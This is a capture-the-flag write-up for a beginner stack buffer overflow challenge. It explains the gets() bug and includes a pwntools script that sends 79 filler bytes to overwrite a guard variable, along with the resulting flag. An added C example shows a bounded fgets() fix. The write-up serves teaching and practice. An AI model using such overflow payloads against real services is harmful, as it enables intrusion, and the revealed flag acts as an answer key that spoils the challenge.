baby bof

Do you know what a buffer overflow is and how it works?

nc tcp.espark.tn 6060

Author: 4n7h4r4x

Files

  • main.c

Description: Basic buffer overflow to change a guard variable.

Solution: The vulnerable code uses gets() to read into a 64-byte buffer, with a char variable x placed after it on the stack. We need to overflow the buffer so that x changes from '\0' to any other value.

Due to stack alignment, the actual offset is 79 bytes:

from pwn import *

host = "tcp.espark.tn"
port = 6060

conn = remote(host, port)
conn.recvuntil(b"?\n")  # wait for the prompt line ending in "?"

# 79 filler bytes reach x; the non-NUL byte after them overwrites it
payload = b"A" * 79 + b"B"
conn.sendline(payload)

response = conn.recvall(timeout=2).decode()
print(response)  # Flag: Spark{g3ts_1s_d4ng3r0us_xd}
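The fix for this bug, as an added example that is not the challenge's main.c (the page does not show it): the same 64-byte buffer plus one-byte guard, but read with fgets() instead of gets(), so the write can never reach x. The struct layout, function names and sample inputs are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* Assumed layout matching the writeup: a 64-byte buffer followed by a
 * one-byte guard that must stay '\0'. A struct guarantees the adjacency
 * here; on the real stack the compiler adds padding, hence offset 79. */
struct frame {
    char buf[BUF_SIZE];
    char x;
};

/* Bounded replacement for gets(): fgets() writes at most sizeof f->buf
 * bytes (NUL included), so it cannot touch f->x. If the line did not fit,
 * the leftover is drained so the next read does not see it. Returns bytes
 * stored (newline stripped), or -1 on EOF/error. */
int read_line_bounded(struct frame *f, FILE *in) {
    if (fgets(f->buf, sizeof f->buf, in) == NULL)
        return -1;
    size_t n = strlen(f->buf);
    if (n > 0 && f->buf[n - 1] == '\n') {
        f->buf[--n] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Feeds a constructed input string through the bounded reader. Returns the
 * number of bytes stored in buf (or -1 on error) and sets *guard_ok to 1
 * if x is still '\0' afterwards, 0 if it was overwritten. */
int feed(const char *input, int *guard_ok) {
    struct frame f;
    memset(&f, 0, sizeof f);
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int n = read_line_bounded(&f, in);
    fclose(in);
    *guard_ok = (f.x == '\0');
    return n;
}

/* Thin wrappers for callers that only need one of the two results. */
int bytes_stored(const char *input) { int ok; return feed(input, &ok); }
int guard_survives(const char *input) { int ok; return feed(input, &ok) < 0 ? -1 : ok; }
```

Even the writeup's 80-byte line is truncated to 63 stored bytes and the guard stays '\0'.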
